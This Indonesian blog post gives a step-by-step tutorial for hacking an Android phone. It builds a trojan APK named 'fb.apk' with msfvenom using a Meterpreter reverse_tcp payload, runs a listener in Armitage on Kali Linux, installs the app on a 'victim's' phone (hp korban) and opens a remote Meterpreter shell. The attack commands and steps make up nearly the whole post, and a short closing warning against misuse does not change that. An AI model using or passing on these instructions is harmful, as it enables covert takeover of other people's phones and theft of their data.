Studi Informatika

Panduan Pembelajaran Ilmu Teknologi & Komputer

Monday, January 29, 2018

Cara Hack Android Dengan Armitage Di Kali Linux

Halo teman-teman semua.. Mungkin biasanya blog ini kebanyakan berisi tentang materi-materi aja, namun kali saya akan memberikan sedikit ilmu dan pengalaman saya mengenai exploit atau biasa disebut dengan hacking. Dalam hacking android kali ini saya akan menggunakan tools armitage, kenapa saya menggunakan armitage, karna lebih mudah dan simple dan kemungkinan besar akan berhasil, karna sebelumnya saya menggunakan msfconsole ada sedikit masalah yaitu " Exploit running as background job 0 " dan saya belum tau cara menanganinya untuk itu saya menggunakan alternatif lain yaitu menggunakan armitage dan akhirnya berhasil.

Kita lansung aja membahas cara hack android dengan armitage di kali linux lansung disimak dan diterapkan..

1.  kita masuk pada tampilan awal pada kali linux.


2. Buka terminal caranya klik kanan pilih open terminal, atau klik aja ikon terminal

3. Kemudian kita akan membuat sebuah trojan, trojan itu bisa di bilang sebuah aplikasi yang nanti akan kita instal di hp korban. Caranya tulis "msfvenom -p android/meterpreter/reverse_tcp lhost=ip kita (cara melilhat ip kita buka terminal baru tulis "ifconfig" setelah muncul copy ip kita, seperti gambar dibawah:

4. Kemudian setelah ip kita di copy lansung aja di paste pada lhost kemudian ikuti saja perintah selanjutnya seperi ini " msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.49 lport=4444 R> /root/Dekstop/fb.apk " jika ada kesalahan Dekstop jangan ditulis lansung saja fb.apk contoh : R> /root/fb.apk, tulisan fb.apk boleh diganti sesuai keinginan asalkan akhiran ada .apk.
 lebih jelas lihat di gambar dibawah:


5. Tunggu sampai muncul tulisan seperti gambar di bawah:


6. Jika sudah muncul tulisan di atas berarti trojannya sudah di buat, kemudian tulis clear untuk membersihkan tulisan sebelumnya, dan tulis "msfdb init" agar aplikasinya siap digunakan.

7. Kemudian tuliskan lagi " /etc/init/.d/postgresql start " kemudian enter

8. Kemudian tulis "clear" enter dan tulis "exit" .
9. Selanjutnya buka armitage dan akan muncul pilihan untuk connect.. kemudian tekan connect


 10. Kemudian akan muncul pilihan untuk Start Metasploit? dan pilih Yes

 11. Kemudian tunggu Progres.. nya selesai

12. Setelah selesai akan muncul tampilan seperti dibawah ini :

 13. Kemudian tuliskan "android" di kolom pencarian sebelah kanan diatas tulisan console


 14. Atau bisa juga lansung pilih payload => android => meterpreter => kemudian pilih " reverse_tcp "

15. Setelah di klik " reverse_tcp " kemudian muncul tampilan seperti gambar dibawah:

16. Kemudian ubah angka di LPORT menjadi 4444 dan pilih lounch

17. Kemudian akan muncul android/meterpreter/reverse_tcp di bagian bawah

18. Kemudian saatnya anda memindahkan trojan atau aplikasi yang sudah dibuat tadi ke hp korban, aplikasi tadi terletak di Dekstop atau jika anda tidak menuliskan Dekstop di saat membuat trojan tadi berarti aplikasinya ada di Files dibagian Home coba aja di buka pasti ada dan kemudian copy dan pindahkan ke hp. Kemudian cara memindahkan bisa menggunakan kabel data atau flashdisk otg yang bisa di colok ke hp. kalau saya aplikasinya ada di dekstop seperti gambar dibawah.



19. Kemudian aplikasi nya sudah kita pindahkan ke hp gambar dibawah adalah tampilan atau mentahan aplikasi atau trojan yang kita buat tadi.
20. Kemudian klik fb.apk tersebut untuk instal

21. Kemudian pilih aja Berikutnya sampai ada perintah untuk Pasang.

22. Kemudian pilih Pasang dan tunggu sampai selesai, kemudian pilih Selesai
23. Setelah aplikasinya terinstal di hp lihat di menu hp aplikasinya bernama MainActivity.


24. Setelah aplikasinya sudah terintsal di hp, cukup sekali saja aplikasinya di klik maka di armitage gambar monitor akan di kelilingi garis tanda merah itu artinya aplikasinya sudah diklik di hp tersebut.


25. Kemudian klik kanan pilih Meterpreter 1 => Interact => Meterpreter Shell

26. Setelah Meterpreter 1 muncul di bagian bawah, itu artinya hp korban sudah bisa kita kuasai, (maksudnya Meterpreter 1 adalah aplikasi di hp di klik 1 kali, jika kliknya 2 kali maka akan muncul Meterpreter 2 dan seterusnya tergantung berapa kali akan diklik di hp maka Meterpreter terakhirlah yang akan kita Interact > Meterpreter Shell. Dan kemudian terserah kita apa yang akan di lakukan.
Untuk melihat perintah yang bisa kita lakukan Tuliskan aja " ? "di meterpreter maka akan muncul pilihan yang bisa kita lakukan.

27. Berhasil dan Selesai.

WARNING !!!
jangan gunakan cara ini untuk hal-hal yang negative. jadikan ini hanya sebagai ilmu dan sebagai keamanan bagi kita sendiri jika ada yang ingin usil kepada kita.
Terima kasih telah berkunjung dan sering-sering berkunjung ke blog ini ya :)
Jika ada pertanyaan tulis aja di komentar.



Monday, January 29, 2018 January 29, 2018 - 3 komentar

3 comments: